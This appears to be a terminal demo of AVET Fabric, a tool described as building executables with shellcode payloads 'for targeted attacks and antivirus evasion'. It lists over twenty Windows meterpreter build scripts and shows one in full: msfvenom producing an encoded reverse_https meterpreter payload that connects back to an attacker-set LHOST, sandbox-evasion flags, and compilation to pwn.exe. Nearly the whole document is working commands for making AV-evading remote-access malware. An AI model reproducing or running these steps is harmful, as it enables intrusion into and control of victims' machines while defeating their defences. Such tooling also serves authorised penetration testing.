.| , +

* | | (( *

|'| ` ._____

+ ___ | | * |. |' .---"|

_ .-' '-. | | .--'| || | _| |

.-'| _.| | || '-__ | | | || |

|' | |. | || | | | | || |

___| '-' ' "" '-' '-.' '` |____

jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

AVET Fabric by Daniel Sauder

 

avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.

 

0: build_win32_meterpreter_rev_https_shikata_fopen.sh

1: build_win32_meterpreter_rev_https_fopen_shikata.sh

2: buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh

3: build_win32_meterpreter_rev_https_50xshikata_quiet.sh

4: build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh

5: build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh

6: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh

7: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh

8: build_win32_meterpreter_rev_https_ASCIIMSF.sh

9: build_win32_meterpreter_rev_https_killswitch_shikata.sh

10: build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh

11: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh

12: build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh

13: build_win32_meterpreter_rev_https_50xshikata.sh

14: build_win32_meterpreter_rev_https_shikata_loadfile.sh

15: build_win32_meterpreter_unstaged_rev_https_40xshikata.sh

16: build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh

17: build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh

18: build_win64_meterpreter_rev_tcp_xor.sh

19: build_win32_meterpreter_rev_https_shikata_load_ie.sh

20: build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh

21: build_win64_meterpreter_rev_tcp_xor_fopen.sh

Input number of the script you want use and hit enter: 0

 

Now you can edit the build script line by line.

 

simple example script for building the .exe file

include script containing the compiler var $win32_compiler

you can edit the compiler in build/global_win32.sh

or enter $win32_compiler="mycompiler" here

$ . build/global_win32.sh

import global default lhost and lport values from build/global_connect_config.sh

$ . build/global_connect_config.sh

override connect-back settings here, if necessary

$ LPORT=$GLOBAL_LPORT

$ LHOST=$GLOBAL_LHOST

make meterpreter reverse payload, encoded with shikata_ga_nai

additionaly to the avet encoder, further encoding should be used

$ msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt

format the shellcode for make_avet

$ ./format.sh sc.txt > scclean.txt && rm sc.txt

call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion

$ ./make_avet -f scclean.txt -F -E

compile to pwn.exe file

$ $win32_compiler -o pwn.exe avet.c

cleanup

$ rm scclean.txt && echo "" > defs.h

 

The following commands will be executed:

#/bin/bash

. build/global_win32.sh

. build/global_connect_config.sh

LPORT=$GLOBAL_LPORT

LHOST=$GLOBAL_LHOST

msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt

./format.sh sc.txt > scclean.txt && rm sc.txt

./make_avet -f scclean.txt -F -E

$win32_compiler -o pwn.exe avet.c

rm scclean.txt && echo "" > defs.h

 

Press enter to continue.

 

Building the output file...

 

Please stand by...

 

The output file should be placed in the current directory.

 

Bye...